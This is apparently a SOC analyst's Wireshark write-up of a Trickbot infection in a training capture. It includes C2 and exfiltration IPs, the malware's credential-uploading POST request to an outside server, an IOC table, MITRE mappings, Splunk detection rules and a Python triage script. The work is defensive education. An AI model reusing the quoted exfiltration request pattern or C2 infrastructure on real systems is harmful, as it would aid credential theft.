Most malware investigations involve reconstructing what might have happened. This one was different.
By following a single HTTP stream in Wireshark, I read stolen credentials in plaintext — Google, Facebook, and Yahoo passwords transmitted to an attacker's server in real time. The entire exfiltration completed in 96 seconds.
Dataset: controlled training exercise from malware-traffic-analysis.net — used widely in the security community for analyst education.
Tools Used
- Wireshark 4.x — packet analysis, HTTP stream following
- VirusTotal — IP and domain reputation
- MITRE ATT&CK Navigator — TTP mapping
- Splunk SPL — detection rule development
Step 1 — Identifying the Victim
Filter: dhcp
| Field | Value |
|---|---|
| Hostname | DESKTOP-CANDLES |
| IP | 10.11.9.102 |
| MAC | 00:08:02:1c:47:ae |
| OS | Windows 10 build 19042 |
| Total packets | 2,502 — highest in capture |
Step 2 — Traffic Overview
Statistics → Conversations → TCP
| IP | Packets | Port | Red Flag |
|---|---|---|---|
| 167.86.123.83 | 1,484 | 447 | Non-standard port |
| 66.85.183.5 | 462 | 443 | Bare IP, no domain |
| 51.81.112.135 | — | 443 | HTTP (not TLS) on port 443 |
Step 3 — IP Reconnaissance (Packet 21)
GET / HTTP/1.1
Host: icanhazip.com
No user action triggers an IP-check service — only malware does this post-infection. Trickbot uses it to confirm internet connectivity and rule out sandboxes.
MITRE: T1016
Step 4 — C2 on Non-Standard Port 447
Filter: tcp.dstport == 447
Many firewalls only inspect port 443 for HTTPS. Port 447 bypasses those rules while still appearing encrypted.
MITRE: T1571
Step 5 — The Impossible User-Agent
Filter: http.user_agent
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0...)
IE7 on Windows 10 is technically impossible. IE7 was released in 2006 and was never made for Windows 10. This is a zero-false-positive detection signature — any log with MSIE 7.0 + Windows NT 10.0 is confirmed malware.
MITRE: T1036
Step 6 — The Credential Exfiltration
Filter: http.request.method == "POST"
At Packet 1592, 21:33:44 UTC:
POST /tar2/DESKTOP-CANDLES_W10019042.1C550D7482EBE49086FC1A7D2100C9E5/81/
Host: 51.81.112.135:443
Content-Length: 627
Right-click → Follow → HTTP Stream:
name="data"
[service URL]|[username]|[password] ← Google account 1
[service URL]|[username]|[password] ← Google account 2
[service URL]|[username]|[password] ← Google account 3
[service URL]|[username]|[password] ← Facebook account
name="source"
chrome passwords
Server: HTTP 200 OK — all data received.
Why HTTP on port 443?
Trickbot uses port 443 for plain HTTP (not TLS). Port 443 is trusted by monitoring tools as "HTTPS = safe." The POST body travels completely unencrypted while the port number hides it in plain sight.
MITRE: T1041 T1555.003
Step 7 — Decoding the Bot ID
/tar2/DESKTOP-CANDLES_W10019042.1C550D7482EBE49086FC1A7D2100C9E5/81/
| Segment | Meaning |
|---|---|
| DESKTOP-CANDLES | Hostname |
| W10019042 | OS build (Windows 10, build 19042) |
| 1C550D7482EBE49086FC1A7D2100C9E5 | Hardware fingerprint |
| 81 | Module: 81 = passwords, 83 = form data, 90 = other data |
This ID is unique per machine, persistent across reboots, and a high-confidence search term across all log sources.
Step 8 — Full Exfiltration Timeline
| Packet | Time (UTC) | Event | Bytes |
|---|---|---|---|
| #21 | 21:30:01 | GET icanhazip.com | minimal |
| #1592 | 21:33:44 | POST module 81 — passwords | 627 |
| #1599 | 21:33:44 | HTTP 200 OK ✓ | — |
| #1727 | 21:34:10 | POST module 90 | 120 |
| #1753 | 21:34:15 | POST module 83 — form data | 612 |
| #2109 | 21:34:47 | POST module 81 — repeat | 346 |
| #2138 | 21:35:20 | POST module 83 — repeat | 637 |
| #2141 | 21:35:20 | HTTP 200 OK ✓ final | — |
Total: 2,342 bytes · 5 POSTs · 5 × HTTP 200 OK · 96.3 seconds
IOC Table
| Type | Value | Role |
|---|---|---|
| IP | 66.85.183.5 | Primary C2 |
| IP | 167.86.123.83 | Secondary C2 — port 447 |
| IP | 51.81.112.135 | Exfiltration server |
| IP | 156.96.128.237 | Secondary exfiltration |
| URI | /tar2/[BOTID]/[MODULE]/ | Trickbot signature |
| Port | 447 outbound | C2 evasion |
| User-Agent | MSIE 7.0 + Windows NT 10.0 | Zero-FP malware signature |
MITRE ATT&CK Map
| ID | Technique |
|---|---|
| T1566 | Phishing |
| T1071.001 | Application Layer Protocol: Web Protocols |
| T1573.001 | Encrypted Channel |
| T1041 | Exfiltration Over C2 Channel |
| T1555.003 | Credentials from Web Browsers |
| T1082 | System Information Discovery |
| T1016 | System Network Configuration Discovery |
| T1571 | Non-Standard Port |
| T1036 | Masquerading |
Detection Rules (Splunk SPL)
Rule 1 — Trickbot URI pattern
```spl
index=network http.request.method=POST http.uri="/tar2/*"
| rex field=http.uri "/tar2/(?<bot_id>[^/]+)/(?<module_id>\d+)/"
| stats count by src_ip, dest_ip, bot_id, module_id
```
Rule 2 — Non-standard port outbound (the port list is parenthesised so `index=network` applies to every alternative; SPL binds AND tighter than OR)
```spl
index=network (dest_port=447 OR dest_port=449 OR dest_port=8082)
| stats count by src_ip, dest_ip, dest_port
| where count > 10
| sort -count
```
Rule 3 — Impossible User-Agent (zero false positives; both wildcard terms must match, which is SPL's implicit AND)
```spl
index=network http.user_agent="*MSIE 7.0*" http.user_agent="*Windows NT 10.0*"
| stats count by src_ip, dest_ip, http.user_agent
```
Rule 4 — Internal host calling IP-check service
```spl
index=network http.request.method=GET
(http.host="icanhazip.com" OR http.host="api.ipify.org"
OR http.host="checkip.amazonaws.com")
| stats count by src_ip, http.host
| where count > 2
```
Rule 5 — Large credential POST to external IP (the private-range check covers all three RFC 1918 blocks, and the dotted field name is single-quoted inside `eval`, where a bare `.` would be read as string concatenation)
```spl
index=network http.request.method=POST
| eval dest_internal=if(match(dest_ip,"^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)"),1,0)
| where dest_internal=0
| eval body_size=coalesce('http.content_length',0)
| where body_size > 200
| stats count, max(body_size) as max_body by src_ip, dest_ip, http.uri
| sort -max_body
```
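The bot-ID decoding from Step 7 and the five detection rules above, carried into one offline Python pass over HTTP log records. This is an added example, not code from the original write-up or from the GitHub report; the log records are constructed from values in the capture (the IP-check server address 203.0.113.10 and the benign 172.16.4.9 upload are placeholders), and `ipaddress` replaces the hand-written private-range regex so 172.16.0.0/12 is not missed.

```python
import re
from ipaddress import ip_address

# Upload URI layout from Step 7: /tar2/<HOSTNAME>_W<os build>.<32-hex hardware fingerprint>/<module>/
BOT_URI = re.compile(
    r"^/tar2/(?P<host>[^_/]+)_W(?P<build>\d+)\.(?P<fp>[0-9A-Fa-f]{32})/(?P<module>\d+)/?$")
MODULES = {"81": "passwords", "83": "form data", "90": "other data"}          # Step 7
IP_CHECK_HOSTS = {"icanhazip.com", "api.ipify.org", "checkip.amazonaws.com"}  # Rule 4

def parse_bot_uri(uri):
    # Returns the bot-ID components, or None when the URI is not a Trickbot upload path
    m = BOT_URI.match(uri)
    if not m:
        return None
    return {"hostname": m["host"], "os_build": m["build"], "fingerprint": m["fp"].upper(),
            "module": m["module"], "module_type": MODULES.get(m["module"], "unknown")}

def flags(rec):
    """Apply the five detection rules to one HTTP log record (a plain dict); return the hits."""
    hits = []
    if parse_bot_uri(rec.get("uri", "")):
        hits.append("trickbot_uri")                                           # Rule 1
    if rec.get("dest_port") in (447, 449, 8082):
        hits.append("nonstandard_port")                                       # Rule 2
    ua = rec.get("user_agent", "")
    if "MSIE 7.0" in ua and "Windows NT 10.0" in ua:
        hits.append("impossible_ua")                                          # Rule 3
    if rec.get("method") == "GET" and rec.get("host") in IP_CHECK_HOSTS:
        hits.append("ip_check")                                               # Rule 4
    # Rule 5: ipaddress knows every RFC 1918 range, including 172.16.0.0/12
    external = not ip_address(rec.get("dest_ip", "0.0.0.0")).is_private
    if rec.get("method") == "POST" and external and rec.get("content_length", 0) > 200:
        hits.append("large_external_post")                                    # Rule 5
    return hits

def triage(records):
    # Collapse per-record hits into one set of rule names per source host (like `stats ... by src_ip`)
    summary = {}
    for rec in records:
        for hit in flags(rec):
            summary.setdefault(rec["src_ip"], set()).add(hit)
    return summary

# Constructed sample records modelled on the capture (the IP-check server address is a placeholder)
SAMPLE_LOGS = [
    {"src_ip": "10.11.9.102", "dest_ip": "203.0.113.10", "dest_port": 80, "method": "GET", "host": "icanhazip.com", "uri": "/"},
    {"src_ip": "10.11.9.102", "dest_ip": "51.81.112.135", "dest_port": 443, "method": "POST",
     "uri": "/tar2/DESKTOP-CANDLES_W10019042.1C550D7482EBE49086FC1A7D2100C9E5/81/", "content_length": 627,
     "user_agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0)"},
    {"src_ip": "10.11.9.50", "dest_ip": "172.16.4.9", "dest_port": 443, "method": "POST", "uri": "/api/upload", "content_length": 5000},
]
```

Running `triage(SAMPLE_LOGS)` returns only the infected host, with all four rules that fired on it; the benign internal upload to 172.16.4.9 produces no hit at all.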
Four Key Takeaways
Port 443 ≠ HTTPS. Always verify the actual protocol, not just the port. Deploy TLS inspection at your proxy.
96 seconds is not enough time for manual triage. Automated detection rules are the only viable defense against this speed.
The bot ID is your best forensic artifact. One string search across all logs = complete picture of the infection.
The impossible User-Agent is a gift. Zero false positives. Write the alert. Fire on any match, no exceptions.
Full Report on GitHub
👉 github.com/himanshumodi3108/cybersec-portfolio
This analysis was performed on a controlled training dataset from malware-traffic-analysis.net for educational purposes.
Himanshu Kumar Modi · Associate at PwC India · SOC Analyst in Training
LinkedIn · Cybersecurity Portfolio